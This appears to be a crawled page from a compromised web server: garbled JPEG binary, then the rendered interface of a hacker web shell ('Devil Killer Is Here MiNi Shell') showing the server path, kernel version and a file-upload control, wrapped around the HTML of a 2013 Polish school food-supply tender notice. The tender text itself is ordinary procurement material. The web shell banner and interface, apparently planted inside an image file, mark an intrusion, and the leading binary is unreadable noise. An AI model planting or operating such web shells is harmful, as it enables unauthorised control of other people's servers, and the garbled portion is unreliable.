JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130814/329704-N-2013.html

<p class="kh_header"><b>Gorzkowice: Dostawa żywności dla Szkoły Podstawowej w Gorzkowicach</b><br>
<b>Numer ogłoszenia: 329704 - 2013; data zamieszczenia: 14.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa w Gorzkowicach , ul. Kościelna 20, 97-350 Gorzkowice, woj. łódzkie, tel. 044 6818004, faks 044 6818004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spgorzkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła podstawowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności dla Szkoły Podstawowej w Gorzkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa żywności dla Szkoły  Podstawowej w Gorzkowicach
Zamawiający dopuszcza składanie ofert częściowych.
Część I  artykuły ogólnospożywcze - dostawy codzienne 
Część II  mięsa drobiowe, wieprzowe, wołowe oraz wyroby wędliniarskie 
Część III  pieczywo
Część IV nabiał 
Część V mrożonki warzywne, owocowe, ryby oraz przetwory z ryb
Część VI warzywa i owoce
Część VII pozostałe
Każdemu Wykonawcy przysługuje możliwość złożenia oferty na wybraną przez siebie część lub części.
Dostawa oznaczona jako Część I artykuły ogólnospożywcze będzie obejmować:Kod Wspólnego Słownika Zamówień (CPV): 03142500-3 (Jaja), 15400000-2 (Oleje i tłuszcze zwierzęce lub roślinne), 15800000-6 (Różne produkty spożywcze)
1. Bułka tarta Wrocławska kg 115
2. Barszcz biały w proszku Winiary szt 361
3. Cukier kg 166
4. Cukier waniliowy szt 47
5. Dżem (500g) szt 75
6. Fasola Jaś kg 135
7. Groch łupany kg 69
8. Jajka szt 3640
9. Koncentrat pomidorowy kg 49
10. Kwasek cytrynowy szt 89
11. Kasza jęczmienna k g269
12. Liść laurowy szt 24
13. Maggi w płynie duża szt 56
14. Makaron świderki Lubella kg 330
15. Makaron nitki Goliard kg38
16. Masło roślinne (500g) szt 112
17. Masło Extra (200g) szt 91
18. Majeranek szt 95
19. Mąka Zamojska kg 272
20. Olej Kujawskil180
21. Pieprz mielony (50g)szt 85
22. Przyprawa Kucharek kg 57
23. Przecier szczawiowy szt 72
24. Ryż kg163
25. Sól kg168
26. Sos do spagetti szt 84
27. Ziele angielskie szt 26
Dostawa oznaczona jako Część II mięsa drobiowe, wieprzowe i wołowe oraz wyroby wędliniarskie będzie obejmować:Kod Wspólnego Słownika Zamówień (CPV):  15100000-9 (Mięso i produkty mięsne)
1. Boczek wędzony kg 96
2.Karczek bkg 244
3.Kości kg 225
4.Kiełbasa wiejska kg 311
5.Łopatka bk kg 764
6.Słoninakg25
7.Szynka - mięso kg 239
8.Smalec kg149
9.Schab z kością kg 376
10.Wołowina bk kg 235
11.Filet z kurczaka kg4 66
12.Ćwiartka z kurczaka kg 535
13.Porcja rosołowa kg187
Dostawa oznaczona jako Część III  Pieczywo będzie obejmować: Kod Wspólnego Słownika Zamówień (CPV): 15811000-6 (Pieczywo)
1.Bułki zwykłe Szt.827
2.Chleb duży krojony Szt.82
Dostawa oznaczona jako Część IV Nabiał : Kod Wspólnego Słownika Zamówień (CPV): 15500000-3 (Produkty mleczarskie)
1.Jogurt owocowy Szt.3
2.Mlekol60
3.Ser biały tłusty Kg 148
4.Śmietana 18 % (400g)Szt.701
Dostawa oznaczona jako Część V mrożonki warzywne, owocowe, ryby oraz przetwory z ryb:Kod Wspólnego Słownika Zamówień (CPV): 15896000-5 (Produkty głęboko mrożone)
1. Filet z miruna (mrożony)Kg492
2. Kalafior (450g)Szt 113
3. Mieszanka owocowa (450g) Szt 103
4. Pyzy z mięsem Kg 382
5. Kluski śląskie Kg 205
6. Fasola szparagowa mrożona Kg 51
Dostawa oznaczona jako Część VI Świeże warzywa i owoce: 
Kod Wspólnego Słownika Zamówień (CPV): 03221000-6 (Warzywa), 03222000-3 (Owoce)
1. Burak czerwony Kg 466
2. Kapusta kiszona Kg 650
3. Kapusta pekińska Kg 353
4. Kapusta biała świeża Kg 334
5. Kapusta czerwona świeża Kg 68
6. Marchew Kg 639
7. Ogórek zielony Kg 411
8. Ogórek kiszony Kg 340
9. Por Szt 169
10. Pietruszka Kg 155
11. Pomidor Kg 149
12. Papryka czerwona Kg34
13. Seler Kg 100
14. Cebula Kg 169
15. Pieczarki Kg 92
16. Ziemniaki kg6316
17. Sałata Szt 138
18. Banan kg1252
19. Jabłka Kg 1660
20. Gruszki Kg 135
21. Mandarynki Kg 502
22. Pomarańcze  Kg  428
Dostawa oznaczona jako Część VII pozostałe:
Kod Wspólnego Słownika Zamówień (CPV):  15894300-4 (Dania gotowe)
1. Pierogi z serem kg 412
W przypadkach, w których Zamawiający użył nazw własnych dla określenia walorów smakowych produktów, Zamawiający dopuszcza produkty o walorach smakowych takich samych (równoważnych) lub wyższych. 
Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do siedziby Zamawiającego znajdującej się w Gorzkowicach przy ul. Kościelnej 26. Każdy z produktów powinien być dostarczony w wymaganych opakowaniach.
Cykliczne dostawy  będą realizowane jak następuje: 
Część I Artykuły ogólnospożywcze - dostawy codzienne od poniedziałku do piątku                  w godzinach od  6.30 do   7.00.
Część II  Wyroby  wędliniarskie i mięso -  w drugim dniu od złożenia zamówienia
od poniedziałku do  piątku w godz. od  6.30 do   7.00.
Część III  Pieczywo -  w  drugim dniu  od złożenia zamówienia od poniedziałku do piątku w godz. od  6.30 do   7.00.
Część IV Nabiał - w drugim dniu od złożenia zamówienia od poniedziałku do piątku w godz. od  6.30 do   7.00.
Część V Mrożonki, ryby i przetwory z ryb - w drugim dniu od złożenia zamówienia
od poniedziałku do piątku w godz. od  6.30 do   7.00.
Część VI Warzywa i owoce - w drugim dniu od złożenia zamówienia od poniedziałku do piątku w godzinach od  6.30 do   7.00
Część VII Pozostałe - w drugim dniu od złożenia zamówienia od poniedziałku do piątku w godzinach od  6.30 do   7.00.
1. Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane produkty z podaniem ilości.
2. Produkty muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
3. Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa towaru wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
4. Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie towaru do siedziby Zamawiającego na okres do następnej dostawy.
5. Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
6. Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia zamówienia.
7. Dopuszcza się możliwość zamiany poszczególnego asortymentu. 
8. Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanego towaru i dostarczenia nowej partii do siedziby  Zamawiającego  w dniu złożenia reklamacji.
9. Do składania zamówień Zamawiający upoważni wybranego pracownika.
10. Tam, gdzie w opisie przedmiotu zamówienia, lub w jakiejkolwiek innej części SIWZ, zostało wskazane pochodzenia materiałów (marka, znak towaru, producent, dostawca) lub normy o których mowa w art. 30 ust 1-3 ustawy PZP, należy uznać, że w miejscu ich wystąpienia występuje zapis lub równoważny. Pod pojęciem równoważności rozumieć należy, iż zagwarantują one realizację zamówienia w zgodzie z opisem przedmiotu zamówienia oraz zapewnia uzyskanie parametrów nie gorszych od założonych w ww. dokumentach. Zamawiający wymaga, aby przedmiot zamówienia równoważny, był podobny pod względem: jakości, ilości, smaku..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3, 15.40.00.00-2, 15.80.00.00-6, 15.10.00.00-9, 15.81.10.00-6, 15.50.00.00-3, 15.89.60.00-5, 03.22.10.00-6, 03.22.20.00-3, 15.89.43.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) Warunek dotyczący posiadania wiedzy i doświadczenia.
Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia zostanie uznane jeżeli wykonawca przedstawi oświadczenie o spełnieniu warunków udziału w postepowaniu na podstawie art. 22 i 44 ustawy. (załącznik nr 3).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący, dysponowaniem odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. 
Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia zostanie uznane jeżeli wykonawca przedstawi oświadczenie o spełnieniu warunków udziału w postepowaniu na podstawie art. 22 i 44 ustawy. (załącznik nr 3).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący, dysponowaniem odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. 
Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia zostanie uznane jeżeli wykonawca przedstawi oświadczenie o spełnieniu warunków udziału w postepowaniu na podstawie art. 22 i 44 ustawy. (załącznik nr 3).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej. 
Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia zostanie uznane jeżeli wykonawca przedstawi oświadczenie o spełnieniu warunków udziału w postepowaniu na podstawie art. 22 i 44 ustawy. (załącznik nr 3).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonywanie zmian umowy zgodnie z art. 144 ustawy w tym także w zakresie postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia następujących warunków: 
1. Zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy. 
2. Wystąpienia omyłek pisarskich i rachunkowych, 
3. Zmiany formy organizacyjnej Wykonawcy (przekształcenie itp.), 
4. Zmiany obowiązujących przepisów prawa, 
5. Inne, które nie będą w sposób istotny ingerować w przedmiot zamówienia.
6. Zmiany w ilości asortymentu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spgorzkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa w Gorzkowicach ul. Kościelna 26 97-350 Gorzkowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2013 godzina 10:00, miejsce: Szkoła Podstawowa w Gorzkowicach ul. Kościelna 26 97-350 Gorzkowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com